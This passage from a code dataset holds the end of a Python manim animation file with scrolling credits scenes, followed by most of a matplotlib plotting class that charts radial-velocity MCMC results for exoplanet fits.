= 0\r\n if remove_rot:\r\n texto.scale(scale).move_to(self)\r\n else:\r\n texto.rotate(linea_referencia.get_angle()).scale(scale).move_to(self)\r\n texto.rotate(inv)\r\n if invert_dir:\r\n inv = -1\r\n else:\r\n inv = 1\r\n texto.shift(self.direccion * (buff + 1) * ancho * inv)\r\n return texto\r\n\r\n def get_tex(self, tex, scale=1, buff=1, invert_dir=False, invert_texto=False, remove_rot=True, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TexMobject(tex, **moreargs)\r\n ancho = texto.get_height() / 2\r\n if invert_texto:\r\n inv = PI\r\n else:\r\n inv = 0\r\n if remove_rot:\r\n texto.scale(scale).move_to(self)\r\n else:\r\n texto.rotate(linea_referencia.get_angle()).scale(scale).move_to(self)\r\n texto.rotate(inv)\r\n if invert_dir:\r\n inv = -1\r\n else:\r\n inv = 1\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return texto\r\n\r\n\r\n\r\nclass Cancel(VGroup):\r\n CONFIG = {\r\n \"line_kwargs\": {\"color\":RED},\r\n \"buff_text\": None,\r\n \"buff_line\": 0.9,\r\n }\r\n def __init__(self,text,**kwargs):\r\n digest_config(self,kwargs)\r\n VGroup.__init__(self,**kwargs)\r\n\r\n pre_coord_dl = text.get_corner(DL)\r\n pre_coord_ur = text.get_corner(UR)\r\n reference_line = Line(pre_coord_dl,pre_coord_ur)\r\n reference_unit_vector = reference_line.get_unit_vector()\r\n coord_dl = text.get_corner(DL) - text.get_center() - reference_unit_vector*self.buff_line\r\n coord_ur = text.get_corner(UR) - text.get_center() + reference_unit_vector*self.buff_line\r\n\r\n line = Line(coord_dl+np.array([0.65,0,0]), coord_ur+np.array([0.65,0,0]),**self.line_kwargs)\r\n self.add(line)\r\n\r\n\r\nclass CancelTerms(Scene):\r\n def construct(self):\r\n formula = TexMobject(\"f(x)\",height=1)\r\n cancel_formula = Cancel(formula)\r\n self.play(Write(formula),Write(cancel_formula))\r\n\r\n\r\nclass CreditsFr(Scene):\r\n def wplay(self, *args, wait=1, run_time=1, rate_func=smooth):\r\n self.play(*args, run_time=run_time, rate_func=rate_func)\r\n if wait != 0:\r\n self.wait(wait)\r\n\r\n def construct(self):\r\n credits = TextMobject(\"Crédits\").set_color(YELLOW).scale(1.7)\r\n thanks = TextMobject(\"Merci pour votre visionnement!!\").set_color(ORANGE).scale(1.7)\r\n\r\n instructor = TexMobject(r\"\\text{Enseignant}\", r\"\\text{Louis-Marc Mercier}\")\r\n viewer = TexMobject(r\"\\text{Spectateur}\", r\"\\text{Vous}\")\r\n chanson = TexMobject(r\"\\text{Chanson (artiste)}\", r\"\\text{Prophecy (Adrian von Ziegler)}\")\r\n lines = [instructor, viewer, chanson]\r\n\r\n instructor[0].align_to([-1, 0, 0], RIGHT).shift(8 * DOWN)\r\n instructor[1].align_to([0, 0, 0], LEFT).shift(8 * DOWN)\r\n\r\n viewer[0].next_to(instructor, DOWN, buff=LARGE_BUFF).align_to(instructor[0], RIGHT)\r\n viewer[1].next_to(instructor, DOWN, buff=LARGE_BUFF).align_to(instructor[1], LEFT)\r\n\r\n chanson[0].next_to(viewer, DOWN, buff=LARGE_BUFF).align_to(viewer[0], RIGHT)\r\n chanson[1].next_to(viewer, DOWN, buff=LARGE_BUFF).align_to(viewer[1], LEFT)\r\n\r\n\r\n credits.set_y(instructor.get_top()[1] + 2 * LARGE_BUFF)\r\n thanks.set_y(-14.5)\r\n\r\n def half_start(t):\r\n # this rate function is great for gradually starting into a `linear` rate\r\n # it goes from 0 to 0.5 in value, and from 0 to 1 in slope (speed)\r\n return 1 / 2 * t ** 2\r\n\r\n everything_no_thanks = VGroup(credits, *lines)\r\n\r\n self.play(VGroup(*everything_no_thanks, thanks).shift, UP, rate_func=half_start)\r\n self.play(VGroup(*everything_no_thanks, thanks).shift, 14 * UP, rate_func=linear, run_time=14)\r\n self.play(everything_no_thanks.shift, 3 * UP, rate_func=linear, run_time=3)\r\n self.remove(*everything_no_thanks)\r\n self.wait(3)\r\n\r\n # all done :)\r\n self.wplay(FadeOut(thanks))\r\n\r\n\r\n\r\nclass CreditsEng(Scene):\r\n def wplay(self, *args, wait=1, run_time=1, rate_func=smooth):\r\n self.play(*args, run_time=run_time, rate_func=rate_func)\r\n if wait != 0:\r\n self.wait(wait)\r\n\r\n def construct(self):\r\n credits = TextMobject(\"Credits\").set_color(YELLOW).scale(1.7)\r\n thanks = TextMobject(\"Thanks for watching!!\").set_color(ORANGE).scale(1.7)\r\n\r\n instructor = TexMobject(r\"\\text{Teacher}\", r\"\\text{Louis-Marc Mercier}\")\r\n viewer = TexMobject(r\"\\text{Viewer}\", r\"\\text{You}\")\r\n chanson = TexMobject(r\"\\text{Song (artist)}\", r\"\\text{Prophecy (Adrian von Ziegler)}\")\r\n lines = [instructor, viewer, chanson]\r\n\r\n instructor[0].align_to([-1, 0, 0], RIGHT).shift(8 * DOWN)\r\n instructor[1].align_to([0, 0, 0], LEFT).shift(8 * DOWN)\r\n\r\n viewer[0].next_to(instructor, DOWN, buff=LARGE_BUFF).align_to(instructor[0], RIGHT)\r\n viewer[1].next_to(instructor, DOWN, buff=LARGE_BUFF).align_to(instructor[1], LEFT)\r\n\r\n chanson[0].next_to(viewer, DOWN, buff=LARGE_BUFF).align_to(viewer[0], RIGHT)\r\n chanson[1].next_to(viewer, DOWN, buff=LARGE_BUFF).align_to(viewer[1], LEFT)\r\n\r\n\r\n credits.set_y(instructor.get_top()[1] + 2 * LARGE_BUFF)\r\n thanks.set_y(-14.5)\r\n\r\n def half_start(t):\r\n # this rate function is great for gradually starting into a `linear` rate\r\n # it goes from 0 to 0.5 in value, and from 0 to 1 in slope (speed)\r\n return 1 / 2 * t ** 2\r\n\r\n everything_no_thanks = VGroup(credits, *lines)\r\n\r\n self.play(VGroup(*everything_no_thanks, thanks).shift, UP, rate_func=half_start)\r\n self.play(VGroup(*everything_no_thanks, thanks).shift, 14 * UP, rate_func=linear, run_time=14)\r\n self.play(everything_no_thanks.shift, 3 * UP, rate_func=linear, run_time=3)\r\n self.remove(*everything_no_thanks)\r\n self.wait(3)\r\n\r\n # all done :)\r\n self.wplay(FadeOut(thanks))\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass NumberedList(BulletedList):\r\n CONFIG = {\r\n \"dot_scale_factor\": 1,\r\n \"num_color\": BLUE,\r\n }\r\n\r\n def __init__(self, *items, **kwargs):\r\n line_separated_items = [s + \"\\\\\\\\\" for s in items]\r\n TextMobject.__init__(self, *line_separated_items, **kwargs)\r\n\r\n","sub_path":"id_rem_french.py","file_name":"id_rem_french.py","file_ext":"py","file_size_in_byte":32330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"547960316","text":"from __future__ import division, print_function\n\nimport copy\nimport os\nfrom decimal import Decimal # histograms\n\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport scipy as sp\nfrom scipy.stats import norm\nfrom tqdm import tqdm\n\nimport corner\nimport emperors_library as emplib\nimport emperors_mirror as empmir\n\n\nclass CourtPainter:\n\n markers = ['o', 'v', '^', '>', '<', '8', 's', 'p', 'H', 'D', '*', 'd']\n error_kwargs = {'lw': 1.75, 'zorder': 0}\n chain_titles = sp.array(\n [\n 'Period', 'Amplitude', 'Phase', 'Eccentricity', 'Longitude',\n 'Acceleration', 'Jitter', 'Offset'\n ]\n )\n chain_units = [\n ' [Days]', r' $[\\frac{m}{s}]$', r' $[rad]$', '', r' $[rad]$',\n r' $[\\frac{m}{s^2}]$'\n ]\n\n def __init__(self, setup, kplanets, working_dir, pdf, png):\n self.ntemps, self.nwalkers, self.nsteps = setup\n self.kplanets = kplanets\n self.working_dir = working_dir\n self.pdf = pdf\n self.png = png\n\n if self.pdf:\n print('\\n\\t\\tWARNING: pdf output might be slow for long chains.')\n\n # Read chains, posteriors and data for plotting.\n self.chains = emplib.read_chains(working_dir + 'chains.pkl')\n self.cold = self.chains[0]\n self.posteriors = emplib.read_posteriors(\n working_dir + 'posteriors.pkl')\n self.all_rv = emplib.read_rv_data(working_dir + 'rv_data.pkl')\n self.time, self.rv, self.err, self.ins = self.all_rv\n\n self.nins = len(sp.unique(self.ins))\n self.ndim = 1 + 5 * kplanets + self.nins * 2\n\n self.__clean_rvs()\n # Setup plots.\n self.__read_config()\n self.time_cb = copy.deepcopy(self.time) - 2450000\n\n # Create directories.\n dirs = ['chains', 'posteriors', 'histograms', 'corners']\n print('\\n\\t\\tCREATING SHOWROOMS.')\n for d in dirs:\n path = self.working_dir + d\n try:\n os.mkdir(path)\n except OSError:\n print(\"Creation of the showroom %s failed\" % path)\n else:\n print(\"Successfully created the showroom %s \" % path)\n pass\n\n def __get_params(self, kplanet):\n \"\"\"Retrieve model parameters.\"\"\"\n period = sp.median(self.cold[:, 5 * kplanet])\n amplitude = sp.median(self.cold[:, 5 * kplanet + 1])\n phase = sp.median(self.cold[:, 5 * kplanet + 2])\n eccentricity = sp.median(self.cold[:, 5 * kplanet + 3])\n longitude = sp.median(self.cold[:, 5 * kplanet + 4])\n params = (period, amplitude, phase, eccentricity, longitude)\n return params\n\n def __get_CI_params(self, kplanet, alpha):\n \"\"\"Retrieve model credibility interval for a given alpha.\"\"\"\n _, period_lo, period_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet], alpha)\n _, amplitude_lo, amplitude_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet + 1], alpha)\n _, phase_lo, phase_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet + 2], alpha)\n _, eccentricity_lo, eccentricity_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet + 3], alpha)\n _, longitude_lo, longitude_up = emplib.credibility_interval(\n self.cold[:, 5 * kplanet + 4], alpha)\n params_lo = (period_lo, amplitude_lo, phase_lo,\n eccentricity_lo, longitude_lo)\n params_up = (period_up, amplitude_up, phase_up,\n eccentricity_up, longitude_up)\n return params_lo, params_up\n\n def __rv_residuals(self):\n \"\"\"Calculate model residuals.\"\"\"\n model = 0.\n for k in range(self.kplanets):\n params = self.__get_params(k)\n model += empmir.mini_RV_model(params, self.time)\n residuals = self.rv0 - model\n return residuals\n\n def __clean_rvs(self):\n \"\"\"Clean radial-velocities by adding the offset and jitter.\"\"\"\n instrumental = self.cold[:, -2 * self.nins:]\n rv0 = copy.deepcopy(self.rv)\n err0 = copy.deepcopy(self.err)\n acc = sp.median(self.cold[:, -2 * self.nins - 1])\n for i in range(self.nins):\n jitter = sp.median(instrumental[:, i])\n offset = sp.median(instrumental[:, i + 1])\n ins = self.ins == i\n # Assume linear acceleration for now.\n rv0[ins] -= offset + acc\n err0[ins] = sp.sqrt(err0[ins] ** 2 + jitter ** 2)\n self.rv0 = rv0\n self.err0 = err0\n pass\n\n def paint_fold(self):\n \"\"\"Create phasefold plot.\"\"\"\n print('\\n\\t\\tPAINTING PHASE FOLDS.')\n if not self.kplanets:\n print('\\n\\t\\tNo planets to paint.')\n # Get globbal max and min for plots\n minx, maxx = self.time.min(), self.time.max()\n cmin, cmax = self.time_cb.min(), self.time_cb.max()\n\n for k in tqdm(range(self.kplanets)):\n params = self.__get_params(k)\n\n fig = plt.figure(figsize=self.phase_figsize)\n gs = gridspec.GridSpec(3, 4)\n ax = fig.add_subplot(gs[:2, :])\n ax_r = fig.add_subplot(gs[-1, :])\n cbar_ax = fig.add_axes([.85, .125, .015, .755])\n fig.subplots_adjust(right=.84, hspace=0)\n\n for i in range(self.nins): # plot per instrument.\n ins = self.ins == i\n t_p, rv_p, err_p = emplib.phasefold(\n self.time[ins], self.rv0[ins], self.err0[ins], params[0]\n )\n _, res_p, _p = emplib.phasefold(\n self.time[ins], self.__rv_residuals()[ins], self.err0[ins],\n params[0]\n )\n # phasefold plot.\n ax.errorbar(\n t_p, rv_p, yerr=err_p, linestyle='', marker=None,\n alpha=.75, ecolor=self.error_color, **self.error_kwargs\n )\n im = ax.scatter(\n t_p, rv_p, marker=self.markers[i], edgecolors='k',\n s=self.phase_size, c=self.time_cb[ins],\n cmap=self.phase_cmap\n )\n im.set_clim(cmin, cmax)\n ax_r.errorbar(\n t_p, res_p, yerr=err_p, linestyle='', marker=None,\n ecolor=self.error_color, **self.error_kwargs\n )\n im_r = ax_r.scatter(\n t_p, res_p, marker=self.markers[i], edgecolors='k',\n s=self.phase_size, c=self.time_cb[ins],\n cmap=self.phase_cmap\n )\n im_r.set_clim(cmin, cmax)\n fig.colorbar(\n im, cax=cbar_ax).set_label(\n 'JD - 2450000', rotation=270, labelpad=self.cbar_labelpad,\n fontsize=self.label_fontsize, fontname=self.fontname\n )\n\n time_m = sp.linspace(self.time.min() - 10,\n self.time.max() + 10, 10000)\n rv_m = empmir.mini_RV_model(params, time_m)\n time_m_p, rv_m_p, _ = emplib.phasefold(\n time_m, rv_m, sp.zeros(10000), params[0])\n\n # Plot best model.\n ax.plot(time_m_p, rv_m_p, '-k', linewidth=2)\n # Plot models CI.\n cred_intervals = [.99, .95, .68] # 3, 2, and 1 sigma\n for s in cred_intervals:\n params_lo, params_up = self.__get_CI_params(k, s)\n # Calculate new models.\n rv_m_lo = empmir.mini_RV_model(params_lo, time_m)\n rv_m_up = empmir.mini_RV_model(params_up, time_m)\n _, rv_m_lo_p, _ = emplib.phasefold(\n time_m, rv_m_lo, sp.zeros(10000), params_lo[0])\n _, rv_m_up_p, _ = emplib.phasefold(\n time_m, rv_m_up, sp.zeros(10000), params_up[0])\n ax.fill_between(time_m_p, rv_m_lo_p, rv_m_up_p,\n color=self.CI_color, alpha=.25)\n\n # A line to guide the eye.\n ax_r.axhline(0, color='k', linestyle='--', linewidth=2, zorder=0)\n\n # Labels and tick stuff.\n ax.set_ylabel(\n r'Radial Velocity (m s$^{-1}$)', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n ax_r.set_ylabel(\n 'Residuals', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n ax_r.set_xlabel(\n 'Phase', fontsize=self.label_fontsize, fontname=self.fontname\n )\n\n ax_r.get_yticklabels()[-1].set_visible(False)\n ax_r.minorticks_on()\n ax.set_xticks([])\n ax.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n ax_r.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n for tick in ax.get_yticklabels():\n tick.set_fontname(self.fontname)\n for tick in ax_r.get_yticklabels():\n tick.set_fontname(self.fontname)\n for tick in ax_r.get_xticklabels():\n tick.set_fontname(self.fontname)\n for tick in cbar_ax.get_yticklabels():\n tick.set_fontname(self.fontname)\n cbar_ax.tick_params(labelsize=self.tick_labelsize)\n\n ax.set_xlim(-.01, 1.01)\n ax_r.set_xlim(-.01, 1.01)\n if self.pdf:\n fig.savefig(self.working_dir + 'phase_fold_' +\n str(k + 1) + '.pdf', bbox_inches='tight')\n if self.png:\n fig.savefig(self.working_dir + 'phase_fold_' +\n str(k + 1) + '.png', bbox_inches='tight')\n\n plt.close('all')\n\n def paint_timeseries(self):\n \"\"\"Create timeseries plot.\"\"\"\n print('\\n\\t\\tPAINTING TIMESERIES.')\n if not self.kplanets:\n print('\\n\\t\\tNo planets to paint.')\n # Get globbal max and min for plots\n minx, maxx = self.time.min(), self.time.max()\n cmin, cmax = self.time_cb.min(), self.time_cb.max()\n\n for k in tqdm(range(self.kplanets)):\n params = self.__get_params(k)\n\n fig = plt.figure(figsize=self.full_figsize)\n gs = gridspec.GridSpec(3, 4)\n ax = fig.add_subplot(gs[:2, :])\n ax_r = fig.add_subplot(gs[-1, :])\n cbar_ax = fig.add_axes([.85, .125, .015, .755])\n fig.subplots_adjust(right=.84, hspace=0)\n\n for i in range(self.nins):\n ins = self.ins == i\n\n ax.errorbar(\n self.time[ins] - 2450000, self.rv0[ins],\n yerr=self.err0[ins], linestyle='', marker=None,\n ecolor=self.error_color, **self.error_kwargs\n )\n im = ax.scatter(\n self.time[ins] - 2450000, self.rv0[ins],\n marker=self.markers[i], edgecolors='k', s=self.full_size,\n c=self.time_cb[ins], cmap=self.full_cmap\n )\n im.set_clim(cmin, cmax)\n\n # Get residuals.\n res = self.__rv_residuals()[ins]\n\n ax_r.errorbar(\n self.time[ins] - 2450000, res, yerr=self.err0[ins],\n linestyle='', marker=None, ecolor=self.error_color,\n **self.error_kwargs\n )\n im_r = ax_r.scatter(\n self.time[ins] - 2450000, res, marker=self.markers[i],\n edgecolors='k', s=self.full_size, c=self.time_cb[ins],\n cmap=self.full_cmap\n )\n\n im_r.set_clim(cmin, cmax)\n fig.colorbar(\n im, cax=cbar_ax).set_label(\n 'JD - 2450000', rotation=270, labelpad=self.cbar_labelpad,\n fontsize=self.label_fontsize, fontname=self.fontname\n )\n time_m = sp.linspace(self.time.min() - 10,\n self.time.max() + 10, 10000)\n time_m -= 2450000\n rv_m = empmir.mini_RV_model(params, time_m)\n\n # Plot best model.\n ax.plot(time_m, rv_m, '-k', linewidth=2)\n\n # Plot models CI.\n cred_intervals = [.99, .95, .68] # 3, 2, and 1 sigma\n for s in cred_intervals:\n params_lo, params_up = self.__get_CI_params(k, s)\n params_lo = (params[0], params_lo[1],\n params_lo[2], params_lo[3], params_lo[4])\n params_up = (params[0], params_up[1],\n params_up[2], params_up[3], params_up[4])\n # Calculate new models.\n rv_m_lo = empmir.mini_RV_model(params_lo, time_m)\n rv_m_up = empmir.mini_RV_model(params_up, time_m)\n\n ax.fill_between(\n time_m, rv_m_lo, rv_m_up, color=self.CI_color, alpha=.25\n )\n\n # A line to guide the eye.\n ax_r.axhline(0, color='k', linestyle='--', linewidth=2, zorder=0)\n\n # Labels and tick stuff.\n ax.set_ylabel(\n r'Radial Velocity (m s$^{-1}$)', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n ax_r.set_ylabel(\n 'Residuals', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n ax_r.set_xlabel(\n 'Time (JD - 2450000)', fontsize=self.label_fontsize,\n fontname=self.fontname\n )\n\n ax_r.get_yticklabels()[-1].set_visible(False)\n ax_r.minorticks_on()\n ax.set_xticks([])\n ax.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n ax_r.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n for tick in ax.get_yticklabels():\n tick.set_fontname(self.fontname)\n for tick in ax_r.get_yticklabels():\n tick.set_fontname(self.fontname)\n for tick in ax_r.get_xticklabels():\n tick.set_fontname(self.fontname)\n for tick in cbar_ax.get_yticklabels():\n tick.set_fontname(self.fontname)\n cbar_ax.tick_params(labelsize=self.tick_labelsize)\n\n offset = (time_m.max() - time_m.min()) * .01\n ax.set_xlim(time_m.min() - offset, time_m.max() + offset)\n ax_r.set_xlim(time_m.min() - offset, time_m.max() + offset)\n if self.pdf:\n fig.savefig(self.working_dir + 'timeseries_' +\n str(k + 1) + '.pdf', bbox_inches='tight')\n if self.png:\n fig.savefig(self.working_dir + 'timeseries_' +\n str(k + 1) + '.png', bbox_inches='tight')\n plt.close('all')\n\n def paint_chains(self):\n \"\"\"Create traceplots or chain plots for each temperature.\"\"\"\n print('\\n\\t\\tPAINTING CHAINS.')\n for t in tqdm(range(self.ntemps), desc='Brush temperature'):\n chain = self.chains[t]\n\n leftovers = len(chain) % self.nwalkers\n if leftovers == 0:\n pass\n else:\n chain = chain[:-leftovers]\n quasisteps = len(chain) // self.nwalkers\n color = sp.arange(quasisteps)\n colors = sp.array(\n [color for i in range(self.nwalkers)]).reshape(-1)\n\n # Auxiliary variables to coordinate labels and filenames.\n tcount = 0\n pcount = 1\n acc = True\n ins = 0\n ins_count = 1\n\n for i in tqdm(range(self.ndim), desc='Brush type'):\n fig, ax = plt.subplots(figsize=self.chain_figsize)\n\n im = ax.scatter(\n sp.arange(chain.shape[0]), chain[:, i],\n c=colors, lw=0, cmap=self.chain_cmap, s=self.chain_size\n )\n\n ax.set_xlabel('N', fontsize=self.label_fontsize)\n ax.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n\n cb = plt.colorbar(im, ax=ax)\n cb.set_label('Step Number', fontsize=self.label_fontsize,\n rotation=270, labelpad=self.cbar_labelpad)\n cb.ax.tick_params(labelsize=self.tick_labelsize)\n\n # plot only accel and instrumental chains.\n if not self.kplanets:\n\n if i == 0:\n title = self.chain_titles[5]\n ax.set_ylabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_ylabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n else:\n\n if pcount <= self.kplanets:\n title = self.chain_titles[tcount % 5]\n ax.set_ylabel(title + self.chain_units[tcount % 5],\n fontsize=self.label_fontsize)\n tcount += 1\n else:\n if acc:\n title = self.chain_titles[5]\n ax.set_ylabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n acc = False\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_ylabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n\n if pcount <= self.kplanets:\n if self.pdf:\n plt.savefig(self.working_dir + 'chains/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'chains/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.png')\n else:\n if self.pdf:\n plt.savefig(self.working_dir + 'chains/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'chains/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.png')\n ins_count += 1\n ins += 1 if ins_count % 2 == 0 else 0\n pcount += 1 if tcount % 5 == 0 else 0\n plt.close('all')\n\n def paint_posteriors(self):\n \"\"\"Create posterior plots.\"\"\"\n print('\\n\\t\\tPAINTING POSTERIORS.')\n for t in tqdm(range(self.ntemps), desc='Brush temperature'):\n chain = self.chains[t]\n post = self.posteriors[t]\n\n leftovers = len(chain) % self.nwalkers\n if leftovers == 0:\n pass\n else:\n chain = chain[:-leftovers]\n post = post[:-(len(post) % self.nwalkers)]\n quasisteps = len(chain) // self.nwalkers\n color = sp.arange(quasisteps)\n colors = sp.array(\n [color for i in range(self.nwalkers)]).reshape(-1)\n\n # Auxiliary variables to coordinate labels and filenames.\n tcount = 0\n pcount = 1\n acc = True\n ins = 0\n ins_count = 1\n\n for i in tqdm(range(self.ndim), desc='Brush type'):\n fig, ax = plt.subplots(figsize=self.post_figsize)\n\n im = ax.scatter(\n chain[:, i], post, s=self.post_size, c=colors, lw=0,\n cmap=self.post_cmap, alpha=self.post_alpha\n )\n\n ax.axvline(\n chain[sp.argmax(post), i], color=self.post_v_color,\n linestyle=self.post_v_linestyle, alpha=self.post_v_alpha,\n zorder=10\n )\n\n ax.tick_params(\n axis='both', which='major',\n labelsize=self.tick_labelsize\n )\n ax.tick_params(axis='x', rotation=45)\n ax.set_ylabel('Posterior', fontsize=self.label_fontsize)\n cb = plt.colorbar(im, ax=ax)\n cb.set_label('Step Number', fontsize=self.label_fontsize,\n rotation=270, labelpad=self.cbar_labelpad)\n cb.ax.tick_params(labelsize=self.tick_labelsize)\n\n xaxis = ax.get_xaxis()\n xaxis.set_major_locator(\n ticker.LinearLocator(numticks=self.post_ticknum)\n )\n yaxis = ax.get_yaxis()\n yaxis.set_major_locator(\n ticker.LinearLocator(numticks=self.post_ticknum)\n )\n\n # plot only accel and instrumental chains.\n if not self.kplanets:\n\n if i == 0:\n title = self.chain_titles[5]\n ax.set_xlabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_xlabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n else:\n\n if pcount <= self.kplanets:\n title = self.chain_titles[tcount % 5]\n ax.set_xlabel(title + self.chain_units[tcount % 5],\n fontsize=self.label_fontsize)\n tcount += 1\n else:\n if acc:\n title = self.chain_titles[5]\n ax.set_xlabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n acc = False\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_xlabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n\n if pcount <= self.kplanets:\n if self.pdf:\n plt.savefig(self.working_dir + 'posteriors/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'posteriors/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.png')\n else:\n if self.pdf:\n plt.savefig(self.working_dir + 'posteriors/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'posteriors/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.png')\n ins_count += 1\n ins += 1 if ins_count % 2 == 0 else 0\n pcount += 1 if tcount % 5 == 0 else 0\n plt.close('all')\n\n def paint_histograms(self):\n \"\"\"Create histograms.\"\"\"\n print('\\n\\t\\tPAINTING HISTOGRAMS.')\n for t in tqdm(range(self.ntemps), desc='Brush temperature'):\n chain = self.chains[t]\n post = self.posteriors[t]\n\n # Auxiliary variables to coordinate labels and filenames.\n tcount = 0\n pcount = 1\n acc = True\n ins = 0\n ins_count = 1\n for i in tqdm(range(self.ndim), desc='Brush type'):\n fig, ax = plt.subplots(figsize=self.post_figsize)\n\n ax.set_ylabel('Frequency', fontsize=self.label_fontsize)\n\n dist = chain[:, i]\n\n peak = dist[sp.argmax(post)]\n n, bins = sp.histogram(dist, self.num_bins, density=1)\n dif = sp.fabs(peak - bins)\n his_peak = bins[sp.argmin(dif)]\n\n res = sp.where(n == 0)[0]\n\n if res.size:\n if len(res) > 2:\n for j in range(len(res)):\n if res[j + 2] - res[j] == 2:\n sub = j\n break\n else:\n sub = res[0]\n\n if bins[sub] > his_peak:\n idx = sp.where(dist <= bins[sub])\n post_sub = post[idx]\n dist_sub = dist[idx]\n else:\n idx = sp.where(dist >= bins[sub])\n post_sub = post[idx]\n dist_sub = dist[idx]\n else:\n dist_sub = dist\n post_sub = post\n\n n, bins, patches = ax.hist(\n dist_sub, self.num_bins, density=1,\n facecolor=self.hist_facecolor, alpha=self.hist_alpha\n )\n\n mu, sigma = norm.fit(dist_sub)\n var = sigma ** 2\n\n # Statistics.\n skew = '{:.4e}'.format(Decimal(sp.stats.skew(dist_sub)))\n kurt = '{:.4e}'.format(Decimal(sp.stats.kurtosis(dist_sub)))\n gmod = '{:.4e}'.format(Decimal(bins[sp.argmax(n)]))\n med = '{:.4e}'.format(Decimal(sp.median(dist_sub)))\n\n span = bins[len(bins) - 1] - bins[0]\n bins_x = ((sp.arange(self.num_bins * 100) /\n (self.num_bins * 100)) * span) + bins[0]\n\n # Make a renormalised gaussian plot.\n y = emplib.hist_gaussian(bins_x, mu, sigma) * n.max()\n\n ax.plot(bins_x, y, 'r-', linewidth=3)\n\n fig.subplots_adjust(left=.15)\n\n ax.set_ylim([0, n.max() * 1.7])\n\n ax.autoscale(enable=True, axis='x', tight=True)\n\n # Add stats to plot as text.\n\n ymin, ymax = ax.get_ylim()\n xmin, xmax = ax.get_xlim()\n\n mu_o = '{:.4e}'.format(Decimal(mu))\n sigma_o = '{:.4e}'.format(Decimal(sigma))\n var_o = '{:.4e}'.format(Decimal(var))\n\n ax.text(xmax - (xmax - xmin) * 0.65, ymax - (ymax - ymin)\n * 0.1, r\"$\\mathcal{N}(\\mu_1,\\sigma^2,\\mu_3,\\mu_4)$\",\n size=25)\n ax.text(xmax - (xmax - xmin) * 0.8, ymax - (ymax - ymin)\n * 0.180, r\"$\\mu_1 ={}$\".format(mu_o), size=20)\n ax.text(xmax - (xmax - xmin) * 0.8, ymax - (ymax - ymin)\n * 0.255, r\"$\\sigma^2 ={}$\".format(var_o), size=20)\n ax.text(xmax - (xmax - xmin) * 0.8, ymax - (ymax - ymin)\n * 0.330, r\"$\\mu_3 ={}$\".format(skew), size=20)\n\n ax.text(xmax - (xmax - xmin) * 0.5, ymax - (ymax - ymin)\n * 0.180, r\"$\\mu_4 ={}$\".format(kurt), size=20)\n ax.text(xmax - (xmax - xmin) * 0.5, ymax - (ymax - ymin)\n * 0.255, r\"$Median ={}$\".format(med), size=20)\n ax.text(xmax - (xmax - xmin) * 0.5, ymax - (ymax - ymin)\n * 0.330, r\"$Mode ={}$\".format(gmod), size=20)\n\n if not self.kplanets:\n\n if i == 0:\n title = self.chain_titles[5]\n ax.set_xlabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_xlabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n else:\n\n if pcount <= self.kplanets:\n title = self.chain_titles[tcount % 5]\n ax.set_xlabel(title + self.chain_units[tcount % 5],\n fontsize=self.label_fontsize)\n tcount += 1\n else:\n if acc:\n title = self.chain_titles[5]\n ax.set_xlabel(\n title + self.chain_units[-1],\n fontsize=self.label_fontsize\n )\n acc = False\n counter = 0\n else:\n title = self.chain_titles[6 + counter % 2]\n ax.set_xlabel(\n title + self.chain_units[1],\n fontsize=self.label_fontsize\n )\n counter += 1\n\n if pcount <= self.kplanets:\n if self.pdf:\n plt.savefig(self.working_dir + 'histograms/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'histograms/' + title +\n '_K' + str(pcount) + '_T' + str(t)\n + '.png')\n else:\n if self.pdf:\n plt.savefig(self.working_dir + 'histograms/' + title\n + '_INS' + 